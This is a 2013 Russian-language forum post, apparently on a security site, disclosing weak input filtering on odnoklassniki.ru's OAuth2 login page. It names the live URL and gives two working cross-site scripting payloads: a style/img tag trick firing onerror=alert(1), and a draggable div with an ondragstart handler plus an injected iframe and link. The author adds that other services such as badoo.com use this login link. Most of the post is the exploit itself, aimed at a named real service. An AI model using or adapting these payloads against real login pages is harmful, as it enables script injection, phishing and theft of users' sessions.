Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: 1
RSS
Уязвимость фильтров odnoklassniki.ru при авторизации .
 
добрый день .

уязвимость заключается в слабой фильтрации полей при авторизации.

вот ссылка http://www.odnoklassniki.ru/dk?st.cmd=OAuth2Login&st.redirect=0

при вводе этих тегов фильтры их пропускают


Код
 <style><img src="</style><img src="http://cdn1.image.tube8.phncdn.com/201305/15/11620611//190x143/2.jpg" onerror=alert(1)//">








или можно даже вставить iframe  с ссылкой на любой сайт


Код
 <div draggable="true" ondragstart="alert();"> <h1><a href = "http://www.securitylab.ru/forum/topic/add/forum16/">НАЖМИ НА МЕНЯ</a></h1> </div> ><iframe src="jfyhjhyvhj"></iframe>




некоторые приложение используют эту ссылку для авторизации через социальные сети например badoo.com





в целом можно добавлять даже кнопки!!!

всем спасибо за внимание!!!
Изменено: niko.lol - 03.06.2013 14:17:51
Страницы: 1
Читают тему